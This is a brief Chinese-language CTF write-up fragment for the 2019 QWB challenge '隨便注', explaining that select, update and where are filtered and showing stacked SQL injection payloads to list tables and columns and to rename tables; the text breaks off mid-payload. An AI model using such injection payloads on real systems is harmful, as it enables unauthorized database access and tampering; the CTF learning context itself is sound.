強網杯2019 隨便注

沒什麼好說的,教程一搜一大堆。教程 這題過濾了select,update,where等關鍵字,不能使用常規的方法進行注入,能夠考慮堆疊注入。table 查表名:1';show tables;#date 查列名:1';show cloumns from XXXX;#select 查看flag有兩種方式:方法 一word 1';rename tables `words` to `words1`;ren
相關文章
相關標籤/搜索